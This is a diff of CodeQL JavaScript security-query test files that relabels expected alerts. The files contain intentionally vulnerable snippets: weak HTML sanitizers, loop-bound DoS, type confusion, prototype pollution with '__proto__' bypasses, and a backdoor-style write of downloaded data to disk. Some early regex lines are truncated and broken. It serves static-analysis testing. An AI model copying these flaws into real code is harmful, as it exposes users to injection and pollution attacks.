b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js @@ -1,14 +1,14 @@ // CVE-2019-10756 (function(content) { - content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // NOT OK - content = content.replace(/ on\w+=".*"/g, ""); // NOT OK - content = content.replace(/ on\w+=\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*\/scrip.*>/gi, ""); // $ Alert + content = content.replace(/ on\w+=".*"/g, ""); // $ Alert + content = content.replace(/ on\w+=\'.*\'/g, ""); // $ Alert return content; }); (function(content) { - content = content.replace(/<.*cript.*/gi, ""); // NOT OK - content = content.replace(/.on\w+=.*".*"/g, ""); // NOT OK - content = content.replace(/.on\w+=.*\'.*\'/g, ""); // NOT OK + content = content.replace(/<.*cript.*/gi, ""); // $ Alert + content = content.replace(/.on\w+=.*".*"/g, ""); // $ Alert + content = content.replace(/.on\w+=.*\'.*\'/g, ""); // $ Alert return content; }); @@ -16,18 +16,18 @@ // CVE-2020-7656 (function(responseText) { var rscript = /)<[^<]*)*<\/script>/gi; - responseText.replace(rscript, ""); // NOT OK + responseText.replace(rscript, ""); // $ Alert return responseText; }); // CVE-2019-1010091 (function(text) { - text = text.replace(//gm, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/, ""); // NOT OK - x = x.replace(/\sng-[a-z-]+/g, ""); // NOT OK (ng-attributes) + x = x.replace(//gm, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/, ""); // $ Alert + x = x.replace(/\sng-[a-z-]+/g, ""); // $ Alert - ng-attributes - x = x.replace(/()/g, "\n"); // OK: not a sanitizer + x = x.replace(/()/g, "\n"); // OK - not a sanitizer - x = x.replace(//g, ""); // OK [INCONSISTENCY] - x = x.replace(/> - > - - + > + > + > + + - - - + + + - + - - + \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js index bca6567b4f5e..324197179d2f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionBad.js @@ -17,7 +17,7 @@ rootRoute.post(function(req, res) { function problem(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert ret.push(val[i]); } } @@ -26,7 +26,7 @@ function whileLoop(val) { var ret = []; var i = 0; - while (i < val.length) { // NOT OK! + while (i < val.length) { // $ Alert ret.push(val[i]); i++; } @@ -35,7 +35,7 @@ function whileLoop(val) { function useLengthIndirectly(val) { var ret = []; - var len = val.length; // NOT OK! + var len = val.length; // $ Alert for (var i = 0; i < len; i++) { ret.push(val[i]); @@ -48,7 +48,7 @@ function noNullPointer(val) { const c = 0; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert // Constantly accessing element 0, therefore not guaranteed null-pointer. ret.push(val[c].foo); diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js index 3193a384aca2..923416c35b8e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitBad.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert for (var k = 0; k < 2; k++) { if (k == 3) { // Does not prevent DoS, because this is inside an inner loop. @@ -31,7 +31,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { try { throw 2; // Is caught, and therefore the DoS is not prevented. @@ -46,7 +46,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // NOT OK! + for (var i = 0; i < val.length; i++) { // $ Alert if (val[i] == null) { (function (i) { return i+2; // Does not prevent DoS. @@ -57,7 +57,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // NOT OK! + _.map(val, function (e) { // $ Alert if (!e) { try { throw new Error(); // Does not prevent DoS. diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js index 705ec6b5b0ea..71586956dad2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionExitGood.js @@ -17,7 +17,7 @@ rootRoute.post(function (req, res) { function breaks(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { break; // Prevents DoS. } @@ -28,7 +28,7 @@ function breaks(val) { function throws(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { throw 2; // Prevents DoS. } @@ -40,7 +40,7 @@ function throws(val) { function returns(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { if (val[i] == null) { return 2; // Prevents DoS. } @@ -49,7 +49,7 @@ function returns(val) { } function lodashThrow(val) { - _.map(val, function (e) { // OK + _.map(val, function (e) { if (!e) { throw new Error(); // Prevents DoS. } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js index 49c813834450..ddd0dcf3301d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionGood.js @@ -23,7 +23,7 @@ function sanitized(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -35,7 +35,7 @@ function sanitized2(val) { return []; } // Val can only be a primitive. Therefore no issue! - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -53,7 +53,7 @@ function sanitized3(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } @@ -67,7 +67,7 @@ function sanitized4(val) { // At this point we know that val must be an Array, and an attacker is // therefore not able to send a cheap request that spends a lot of time // inside the loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i] + 42); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js index 2f2fdb0d67a0..548d0fc944a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionLodash.js @@ -10,5 +10,5 @@ rootRoute.post(function(req, res) { }); function problem(val) { - _.chunk(val, 2); // NOT OK! + _.chunk(val, 2); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js index 22649392557e..a9817883f082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousLengthCheck.js @@ -16,7 +16,7 @@ function problem(val) { return []; } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js index b8e4b1f50971..bd3aed633ff5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointer.js @@ -21,7 +21,7 @@ rootRoute.post(function(req, res) { function nullPointer(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo + 42); } } @@ -30,7 +30,7 @@ function nullPointer(val) { function nullPointer2(val) { var ret = []; - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { var element = val[i]; ret.push(element.foo + 42); } @@ -38,7 +38,7 @@ function nullPointer2(val) { function nullPointer3(val) { let arr = val.messaging - for (let i = 0; i < arr.length; i++) { // OK + for (let i = 0; i < arr.length; i++) { let event = val.messaging[i] let sender = event.sender.id } @@ -46,13 +46,13 @@ function nullPointer3(val) { function lodashPointer(val) { - return _.map(val, function(e) { // OK + return _.map(val, function(e) { return e.foo; }) } function lodashArrowFunc(val) { - return _.map(val, (e) => { // OK + return _.map(val, (e) => { return e.foo; }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js index bbbe3a9eb7ee..ac456fbdbd94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js +++ b/javascript/ql/test/query-tests/Security/CWE-834/LoopBoundInjectionObviousNullPointerInPreviousLoop.js @@ -14,11 +14,11 @@ function nullPointer(val) { var ret = []; // Has obvious null-pointer. And guards the next loop. - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i].foo); } - for (var i = 0; i < val.length; i++) { // OK + for (var i = 0; i < val.length; i++) { ret.push(val[i]); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index 3f5840b9f080..d859f2ade6e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -3,59 +3,59 @@ var Koa = require('koa'); express().get('/some/path', function (req, res) { var foo = req.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert - foo.concat(); // NOT OK + foo.concat(); // $ Alert function f() { - foo.concat(); // NOT OK + foo.concat(); // $ Alert } function g(bar) { - bar.concat(); // NOT OK + bar.concat(); // $ Alert } g(foo); - req.url.indexOf(); // OK + req.url.indexOf(); - foo.indexOf(prefix) === 0; // OK - foo.indexOf(prefix) == 0; // OK - foo.indexOf(prefix) !== 0; // OK + foo.indexOf(prefix) === 0; + foo.indexOf(prefix) == 0; + foo.indexOf(prefix) !== 0; - foo.slice(-1) === 'x'; // OK + foo.slice(-1) === 'x'; - foo.indexOf(prefix) == 1; // NOT OK - foo.slice(1) === 'x'; // NOT OK + foo.indexOf(prefix) == 1; // $ Alert + foo.slice(1) === 'x'; // $ Alert if (typeof foo === "string") { - foo.indexOf(); // OK + foo.indexOf(); } else { - foo.indexOf(); // OK + foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // OK, but still flagged [INCONSISTENCY] + foo.indexOf(); // $ SPURIOUS: Alert } - (foo + f()).indexOf(); // OK + (foo + f()).indexOf(); - foo.length; // NOT OK + foo.length; // $ Alert }); new Koa().use(function handler(ctx) { var foo = ctx.request.query.foo; - foo.indexOf(); // NOT OK + foo.indexOf(); // $ Alert }); express().get('/some/path/:foo', function (req, res) { var foo = req.params.foo; - foo.indexOf(); // OK + foo.indexOf(); }); express().get('/some/path/:foo', function (req, res) { - if (req.query.path.length) { } // OK - req.query.path.length == 0; // OK - !req.query.path.length; // OK - req.query.path.length > 0; // OK + if (req.query.path.length) { } + req.query.path.length == 0; + !req.query.path.length; + req.query.path.length > 0; }); express().get('/some/path/:foo', function (req, res) { @@ -65,11 +65,11 @@ express().get('/some/path/:foo', function (req, res) { return; } - while (p.length) { // OK + while (p.length) { p = p.substr(1); } - p.length < 1; // OK + p.length < 1; }); express().get('/some/path/:foo', function (req, res) { @@ -78,8 +78,8 @@ express().get('/some/path/:foo', function (req, res) { }); function safeGet(obj, p) { - if (p === '__proto__' || // NOT OK - could be singleton array - p === 'constructor') { // NOT OK - could be singleton array + if (p === '__proto__' || // $ Alert - could be singleton array + p === 'constructor') { // $ Alert - could be singleton array return null; } return obj[p]; @@ -87,24 +87,24 @@ function safeGet(obj, p) { express().get('/foo', function (req, res) { let data = req.query; - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } if (typeof data.foo !== 'string') { - data.foo.indexOf(); // OK + data.foo.indexOf(); } if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } }); express().get('/foo', function (req, res) { let data = req.query.data; - data.indexOf(); // NOT OK + data.indexOf(); // $ Alert if (Array.isArray(data)) { - data.indexOf(); // OK + data.indexOf(); } else { - data.indexOf(); // OK + data.indexOf(); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-912/tst.js b/javascript/ql/test/query-tests/Security/CWE-912/tst.js index 78acef7d3aad..88e7827a480c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js @@ -13,27 +13,27 @@ try { (response) => { response.setEncoding('utf8'); response.on('data', (c) => { - fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file + fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file let writeStream = fs.createWriteStream('/usr/evil/evil.cmd'); - writeStream.write(c); // BAD: data from response 'on' event flows to filestream write + writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write writeStream.end(); var stream = fs.createWriteStream("my_file.txt"); stream.once('open', function (fd) { - stream.write(c); // BAD: data from response 'on' event flows to filestream write + stream.write(c); // $ Alert - data from response 'on' event flows to filestream write stream.end(); }); }); response.on('error', () => { - fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file + fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file }); }).on('error', () => { let error = "error occured"; let writeStream = fs.createWriteStream('/usr/good/errorlog.txt'); - writeStream.write(error); // GOOD: static data written to file stream + writeStream.write(error); // OK - static data written to file stream writeStream.end(); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index fb550533d124..6acf7ef2df10 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -3,7 +3,7 @@ module.exports.set = function recSet(obj, path, value) { var currentValue = obj[currentPath]; if (path.length === 1) { if (currentValue === void 0) { - obj[currentPath] = value; // NOT OK + obj[currentPath] = value; // $ Alert } return currentValue; } @@ -12,18 +12,18 @@ module.exports.set = function recSet(obj, path, value) { } module.exports.set2 = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs = function() { var obj = arguments[0]; var path = arguments[1]; var value = arguments[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.usedInTest = function (obj, path, value) { - return obj[path[0]][path[1]] = value; // NOT OK + return obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs2 = function() { @@ -31,7 +31,7 @@ module.exports.setWithArgs2 = function() { var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } module.exports.setWithArgs3 = function() { @@ -39,7 +39,7 @@ module.exports.setWithArgs3 = function() { var obj = args[0]; var path = args[1]; var value = args[2]; - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } function id(s) { @@ -52,7 +52,7 @@ module.exports.notVulnerable = function () { const path = id("x"); const value = id("y"); const obj = id("z"); - return (obj[path[0]][path[1]] = value); // OK + return (obj[path[0]][path[1]] = value); } class Foo { @@ -67,12 +67,12 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // NOT OK + return (obj[path[0]][path[1]] = value); // $ Alert } safe() { const obj = this.obj; - obj[path[0]] = this.value; // OK + obj[path[0]] = this.value; } } @@ -81,10 +81,10 @@ module.exports.Foo = Foo; module.exports.delete = function() { var obj = arguments[0]; var path = arguments[1]; - delete obj[path[0]]; // OK + delete obj[path[0]]; var prop = arguments[2]; var proto = obj[path[0]]; - delete proto[prop]; // NOT OK + delete proto[prop]; // $ Alert } module.exports.fixedProp = function (obj, path, value) { @@ -105,18 +105,18 @@ module.exports.sanWithFcuntion = function() { var two = arguments[2]; var value = arguments[3]; - obj[one][two] = value; // NOT OK + obj[one][two] = value; // $ Alert if (isPossibilityOfPrototypePollution(one) || isPossibilityOfPrototypePollution(two)) { throw new Error('Prototype pollution is not allowed'); } - obj[one][two] = value; // OK + obj[one][two] = value; } module.exports.returnsObj = function () { return { set: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } } } @@ -125,7 +125,7 @@ class MyClass { constructor() {} set(obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } static staticSet(obj, path, value) { diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js index d74de12493aa..f8ed4b8235ab 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js @@ -1,3 +1,3 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js index 4d3e7a82f5c8..e15bbf81cddd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/other.js @@ -3,7 +3,7 @@ Foobar.prototype = { method: function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js index 66db628cfcc0..1a662007b49a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/sublib/sub.js @@ -1,5 +1,5 @@ module.exports.set = function (obj, path, value) { - obj[path[0]][path[1]] = value; // NOT OK + obj[path[0]][path[1]] = value; // $ Alert } var other = require('./other') diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js index a622a8913905..770df9ab2cf1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/tst.js @@ -5,50 +5,50 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK - object[taint].foo = 'bar'; // NOT OK - may pollute, although attacker has no control over data being injected - object.baz[taint] = taint; // OK + object[taint][taint] = taint; // $ Alert + object[taint].foo = 'bar'; // $ Alert - may pollute, although attacker has no control over data being injected + object.baz[taint] = taint; mutateObject(object[taint], 'blah'); - unsafeGetProp(object, taint).foo = 'bar'; // NOT OK - unsafeGetProp(object, 'safe').foo = 'bar'; // OK + unsafeGetProp(object, taint).foo = 'bar'; // $ Alert + unsafeGetProp(object, 'safe').foo = 'bar'; - safeGetProp(object, taint).foo = 'bar'; // OK + safeGetProp(object, taint).foo = 'bar'; let possiblyProto = object[taint] || new Box(); possiblyProto.m(); let prototypeLessObject = Object.create(null); - prototypeLessObject[taint][taint] = taint; // OK + prototypeLessObject[taint][taint] = taint; let directlyMutated = {}; directlyMutated[taint] = taint; // OK - can't affect Object.prototype if (object.hasOwnProperty(taint)) { - object[taint].foo = 'bar'; // OK + object[taint].foo = 'bar'; } }); function mutateObject(obj, x) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert if (obj instanceof Object) { - obj.foo = x; // OK + obj.foo = x; } if (obj != null) { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'function') { - obj.foo = x; // OK + obj.foo = x; } if (typeof obj !== 'function') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj === 'object') { - obj.foo = x; // NOT OK + obj.foo = x; // $ Alert } if (typeof obj !== 'object') { - obj.foo = x; // OK + obj.foo = x; } } @@ -77,39 +77,39 @@ app.get('/', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert - object["" + taint]["" + taint] = taint; // NOT OK + object["" + taint]["" + taint] = taint; // $ Alert if (!taint.includes("__proto__")) { - object[taint][taint] = taint; // OK + object[taint][taint] = taint; } else { - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert } }); app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace('_', '-')].x = 'foo'; // OK - obj[req.query.x.replace('_', '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(/_/g, '')].x = 'foo'; // OK - obj[req.query.x.replace(/_/g, '-')].x = 'foo'; // OK - obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // NOT OK - "__pr__proto__oto__" - obj[req.query.x.replace('o', '0')].x = 'foo'; // OK + obj[req.query.x.replace('_', '-')].x = 'foo'; + obj[req.query.x.replace('_', '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(/_/g, '')].x = 'foo'; + obj[req.query.x.replace(/_/g, '-')].x = 'foo'; + obj[req.query.x.replace(/__proto__/g, '')].x = 'foo'; // $ Alert - "__pr__proto__oto__" + obj[req.query.x.replace('o', '0')].x = 'foo'; }); app.get('/bar', (req, res) => { let taint = String(req.query.data); let object = {}; - object[taint][taint] = taint; // NOT OK + object[taint][taint] = taint; // $ Alert const bad = ["__proto__", "constructor"]; if (bad.includes(taint)) { return; } - object[taint][taint] = taint; // OK + object[taint][taint] = taint; }); app.get('/assign', (req, res) => { @@ -126,7 +126,7 @@ app.get('/assign', (req, res) => { app.get('/foo', (req, res) => { let obj = {}; - obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; // OK - obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // NOT OK - obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; // OK + obj[req.query.x.replace(new RegExp('_', 'g'), '')].x = 'foo'; + obj[req.query.x.replace(new RegExp('_', ''), '')].x = 'foo'; // $ Alert + obj[req.query.x.replace(new RegExp('_', unknownFlags()), '')].x = 'foo'; }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js index c7285a3ac1bd..c53d6f20aca1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js @@ -12,7 +12,7 @@ function assignToPath(target, path, value) { } target = target[key]; } else { - target[key] = value; // NOT OK + target[key] = value; // $ Alert } } } @@ -28,7 +28,7 @@ function assignToPathSafe(target, path, value) { } target = target[key]; } else { - target[key] = value; // OK + target[key] = value; } } } @@ -41,7 +41,7 @@ function assignToPathAfterLoop(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function splitHelper(path, sep) { @@ -58,7 +58,7 @@ function assignToPathWithHelper(target, path, value, sep) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function spltOnRegexp(target, path, value) { @@ -68,5 +68,5 @@ function spltOnRegexp(target, path, value) { let key = keys[i]; target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index 14a0a19fb626..ad420927a5c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -5,7 +5,7 @@ function copyUsingForIn(dst, src) { if (dst[key]) { copyUsingForIn(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -15,7 +15,7 @@ function copyUsingKeys(dst, src) { if (dst[key]) { copyUsingKeys(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -33,7 +33,7 @@ function copyRestAux(dst, value, key) { if (dstValue) { copyRest(dstValue, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } @@ -43,7 +43,7 @@ function copyProtoGuarded(dst, src) { if (dst[key]) { copyProtoGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -54,7 +54,7 @@ function copyCtorGuarded(dst, src) { if (dst[key]) { copyCtorGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -65,7 +65,7 @@ function copyDoubleGuarded(dst, src) { if (dst[key]) { copyDoubleGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -80,7 +80,7 @@ function copyComplex(dst, src) { if (dst[key]) { copyComplex(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -93,7 +93,7 @@ function copyHasOwnProperty(dst, src) { if (dst.hasOwnProperty(key)) { copyHasOwnProperty(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -106,7 +106,7 @@ function copyHasOwnPropertyBad(dst, src) { if (dst[key]) { copyHasOwnPropertyBad(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -118,21 +118,21 @@ function copyHasOwnPropertyTearOff(dst, src) { if (_hasOwnProp.call(dst, key)) { copyHasOwnPropertyTearOff(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function shallowExtend(dst, src) { for (let key in src) { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } function transform(src, fn) { if (typeof src !== 'object') return fn(src); for (let key in src) { - src[key] = transform(src[key], fn); // OK + src[key] = transform(src[key], fn); } return src; } @@ -141,7 +141,7 @@ function clone(src) { if (typeof src !== 'object') return src; let result = {}; for (let key in src) { - result[key] = clone(src[key]); // OK + result[key] = clone(src[key]); } return result; } @@ -151,7 +151,7 @@ function higherOrderRecursion(dst, src, callback) { if (dst[key]) { callback(dst, src, key); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -168,7 +168,7 @@ function instanceofObjectGuard(dst, src) { if (typeof dstValue === 'object' && dstValue instanceof Object) { instanceofObjectGuard(dstValue, src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -181,7 +181,7 @@ function copyWithBlacklist(dst, src) { if (dst[key]) { copyWithBlacklist(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -193,7 +193,7 @@ function copyUsingPlainForLoop(dst, src) { if (dst[key]) { copyUsingPlainForLoop(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -205,7 +205,7 @@ function copyUsingPlainForLoopNoAlias(dst, src) { if (dst[key]) { copyUsingPlainForLoopNoAlias(dst[keys[i]], src[keys[i]]); } else { - dst[keys[i]] = src[keys[i]]; // NOT OK - but not flagged + dst[keys[i]] = src[keys[i]]; // $ MISSING: Alert } } } @@ -214,7 +214,7 @@ function deepSet(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // OK + map[key1][key2] = value; } function deepSetCaller(data) { @@ -230,7 +230,7 @@ function deepSetBad(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // NOT OK - object literal can flow here + 